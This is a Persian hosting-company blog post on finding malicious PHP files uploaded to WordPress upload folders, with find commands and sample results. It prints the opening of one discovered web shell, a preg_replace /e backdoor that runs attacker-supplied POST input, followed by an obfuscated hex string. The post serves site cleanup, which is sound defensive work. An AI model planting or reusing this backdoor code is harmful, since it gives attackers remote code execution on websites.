‏‪‫حذف Malware های آپلود شده از طریق shell در وردپرس

ایران‌سرور پنج شنبه ۱۰ دی ۱۳۹۴ امنیت , مقالات

اگر شما دارای تعدادی زیادی وبسایت که با وردپرس ایجاده شده اند هستید، بارها ممکن است با این مشکل روبرو شده باشید، بطور کلی بیشتر این هکرهای عزیز به دنبال فولدر هایی می گردند که سطح درستی آنها ۷۷۷ می باشد، که در وردپرس رایج ترین مسیر /wp-content/uploads/ می باشد؛ بنابراین لازم است که به دنبال فایل های آپلود شده در این مسیر بر حسب تاریخ بگردیم، بدین منظور درshell دستور زیر را اجرا کنید :

find ./public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort

1	find ./public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' \| sort

به عنوان نمونه، نتیجه بررسی به صورت زیر می باشد:

2015-10-16 12:25:01 ./wp-content/uploads/2013/05/blog84.php
2015-10-16 12:25:01 ./wp-content/uploads/2014/10/dump.php
2015-10-16 12:25:01 ./wp-content/uploads/2014/code.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/07/session90.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/09/xml96.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/504.php
2015-10-16 12:25:01 ./wp-content/uploads/about_us.php
2015-10-16 12:25:01 ./wp-content/uploads/contactus.php
2015-10-16 12:25:01 ./wp-content/uploads/rtbwvcsxrnbsvcd.php
2015-10-16 12:25:01 ./wp-content/uploads/sc_afsed.php
2015-10-16 12:25:01 ./wp-content/uploads/team.php
2015-10-16 12:25:01 ./wp-content/uploads/wp-upload.php

2015-10-16 12:25:01 ./wp-content/uploads/2013/05/blog84.php

2015-10-16 12:25:01 ./wp-content/uploads/2014/10/dump.php

2015-10-16 12:25:01 ./wp-content/uploads/2014/code.php

2015-10-16 12:25:01 ./wp-content/uploads/2015/07/session90.php

2015-10-16 12:25:01 ./wp-content/uploads/2015/09/xml96.php

2015-10-16 12:25:01 ./wp-content/uploads/2015/504.php

2015-10-16 12:25:01 ./wp-content/uploads/about_us.php

2015-10-16 12:25:01 ./wp-content/uploads/contactus.php

2015-10-16 12:25:01 ./wp-content/uploads/rtbwvcsxrnbsvcd.php

2015-10-16 12:25:01 ./wp-content/uploads/sc_afsed.php

2015-10-16 12:25:01 ./wp-content/uploads/team.php

2015-10-16 12:25:01 ./wp-content/uploads/wp-upload.php

می توانید با دستور head خطوط اولیه این فایل ها را جهت بررسی محتوای آن مشاهده نمایید.

به عنوان مثال در فایل blog84.php بدین صورت می باشد:

head ./wp-content/uploads/2013/05/blog84.php
<?php @preg_replace('/(.*)/e', @$_POST['dnrdztvetxn'], '');
$GLOBALS['af4569'] = "\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5

head ./wp-content/uploads/2013/05/blog84.php

<?php @preg_replace('/(.*)/e', @$_POST['dnrdztvetxn'], '');

$GLOBALS['af4569'] = "\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5

همانطور که مشاهده می نماید این فایل ها لازم است که سریع حذف شوند.

می توانید با دستور rm filename فایل مورد نظر (بعنوان مثال: blog84.php ) را حذف نمایید.

همچنین شما میتوانید از طریق دستور زیر، تمام سرور خود را برای پیدا کردن فایل های مخرب بررسی کنید

find /home/*/domains/*/public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort

1	find /home//domains//public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' \| sort

رعایت این موارد می تواند کمک زیادی برای جلوگیری از بلک لیست شدن آی پی میل سرور نماید.

برچسب ها :

malware

با عضویت در خبرنامه شما را از آخرین تجربیات مان و مطالب تخصصی آگاه خواهیم کرد.

ایران سرور

وبــلاگ